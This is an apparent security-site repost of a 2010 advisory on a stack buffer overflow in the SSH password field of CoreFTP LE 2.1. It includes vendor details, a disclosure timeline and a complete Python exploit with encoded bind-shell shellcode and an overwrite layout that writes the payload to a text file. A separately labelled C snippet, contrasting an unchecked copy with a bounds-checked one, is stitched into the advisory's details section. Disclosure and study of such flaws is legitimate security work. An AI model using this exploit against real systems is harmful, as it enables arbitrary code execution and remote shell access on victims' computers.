SecurityReason.com - Our Reason is Security


Topic : CoreFTP 2.1 Stack Buffer Overflow and Universal BOF

WLB : WLB-2010020017
SecurityAlert : None
Date : 2010-02-03
Credit : mr_me
Added by : SecurityReason
SecurityRisk : High
Remote : No
Local : Yes
Status : Bug
History : [2010-02-03] Started
Affected software : CoreFTP 2.1

Text :


Advisory : CORELAN-10-007
Disclosure date : 2nd Feb 2010


0x00 : Vulnerability information
--------------------------------

[*] Product : Coreftp LE
[*] Version : 2.1
[*] Vendor : ServersMan
[*] URL : http://www.coreftp.com/
[*] Platform : Windows XP SP3
[*] Type of vulnerability : Local Stack buffer overflow
[*] Risk rating : Low
[*] Issue fixed in version : No
[*] Vulnerability discovered by : mr_me
[*] Greetings to : corelanc0d3r, EdiStrosar, jnz, rick2600, ekse, MarkoT, sinn3r & Jacky from Corelan Team


0x01 : Vendor description of software
-------------------------------------
From the vendor website:

Now you can download Core FTP LE - free Windows software that includes the
client FTP features you need. Features like SFTP (SSH), SSL, TLS, IDN,
browser integration, site to site transfers, FTP transfer resume, drag and
drop support, file viewing & editing, firewall support, custom
commands, FTP URL parsing, command line transfers, filters, and much, much
more!

This free, secure FTP client gives you a fast, easy, reliable way to update
and maintain your website via FTP. It also provides a secure method (via
SSL, TLS, or SFTP) to upload / download files to and from FTP servers.
Check out the list of features and you'll find almost every feature you
need, all in a free ftp program. There are no popup ads, advertising or
spyware and you're never asked or reminded to register.


0x02 : Vulnerability details
----------------------------
The vulnerability is triggered by convincing a user to enter an overly long
string in the SSH password field. The destination buffer is not length
checked, so the overflow corrupts the stack, gives control of the
instruction pointer and allows arbitrary code execution in the context of
the user running CoreFTP.
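The bug class described above, as an added example that is not part of the advisory or of CoreFTP's code: a password copied into a fixed stack buffer with no length check, next to a hardened version that measures the input against the buffer first and rejects anything that does not fit. PASSWORD_MAX and the function names are assumptions; the advisory does not state the real buffer size.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PASSWORD_MAX 256   /* assumed size; the advisory does not state the real one */

/* Vulnerable pattern from the advisory: the input is copied into a fixed
 * stack buffer with no length check, so an overlong password overwrites
 * whatever lies beyond the buffer. Never feed it untrusted input. */
int set_password_unchecked(const char *input)
{
    char password[PASSWORD_MAX];
    strcpy(password, input);   /* unbounded copy: the bug */
    return (int)strlen(password);
}

/* Hardened form: measure the input against the buffer first and refuse
 * anything that does not fit, terminator included. Returns 0 when stored,
 * -1 when rejected; no silent truncation, which would only hide the issue. */
int set_password_checked(const char *input, size_t *stored_len)
{
    char password[PASSWORD_MAX];
    size_t n = 0;
    while (n < PASSWORD_MAX && input[n] != '\0')
        n++;
    if (n == PASSWORD_MAX)
        return -1;
    memcpy(password, input, n + 1);
    if (stored_len)
        *stored_len = n;
    return 0;
}

/* Constructs a password of `len` 'A' bytes (the PoC's filler byte) and
 * returns 1 if the checked setter rejects it, 0 if it accepts it. */
int checked_rejects_length(size_t len)
{
    char *buf = malloc(len + 1);
    if (buf == NULL)
        return -1;
    memset(buf, 'A', len);
    buf[len] = '\0';
    int rc = set_password_checked(buf, NULL);
    free(buf);
    return rc == -1 ? 1 : 0;
}
```

The 6000-byte case mirrors the input length the PoC comments mention; the checked setter refuses it before any copy takes place.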




0x03 : Vendor communication
---------------------------
[*] January 17, 2010 - Initial disclosure to the vendor
[*] January 20, 2010 - Vendor reminded about vulnerability
[*] January 21, 2010 - Vendor replied and acknowledged the vulnerability
[*] January 21, 2010 - Requested patch date
[*] January 30, 2010 - Reminded vendor to provide a patch release date
[*] February 2, 2010 - No contact or response from vendor
[*] February 2, 2010 - Public disclosure

0x04 : Exploit/PoC
------------------

#!/usr/bin/python
#
# Vulnerability : CoreFTP v2.1 b1637 (password field) Universal BOF exploit
# Found by : mr_me (seeleymagic [at] hotmail [dot] com)
# Coded by : mr_me & corelanc0d3r
# Download from : http://www.coreftp.com/download.html
# Tested on : XP SP3 En (VirtualBox)
# Greetz to : corelanc0d3r, EdiStrosar, jnz, rick2600, ekse, MarkoT, sinn3r & Jacky from Corelan Team
# Advisory : http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-007-coreftp-password-field-stack-buffer-overflow/
#
# Thanks to Dr_IDE for pointing me to this app :)
# Notes: This app was compiled with safeSEH, so a call dword did the trick ;)
# If you manage to convince a user to input a 6000 length string as a password
# then they deserve to be owned...! ;)
#
# Usage: Quick connect --> Advanced --> SSH --> password --> bind shell ;)
#
# mrme@backtrack:~$ nc -v 192.168.2.9 4444
# 192.168.2.9: inverse host lookup failed: Unknown server error :
# Connection timed out
# (UNKNOWN) [192.168.2.9] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\PROGRA~1\CoreFTP>
#

print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] CoreFTP v2.1 b1637 (password field) Universal BOF exploit"

sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")

print "[+] Creating evil buffer string in overflowpassword.txt, ph33r"

stuff = "\x41" * 145
stuff += "\x90" * 5
stuff += sc
stuff += "\x41" * (1008-len(stuff)-5)
stuff += "\xe9\x7c\xfc\xff\xff" # Lets fly
stuff += "\xeb\xf9\x90\x90" # Jump back
stuff += "\x0b\x0b\x27\x00" # partial/null overwrite

pwn = open('overflowpassword.txt','w')
pwn.write(stuff)
pwn.close()

Copyright © SecurityReason.com. All Rights Reserved.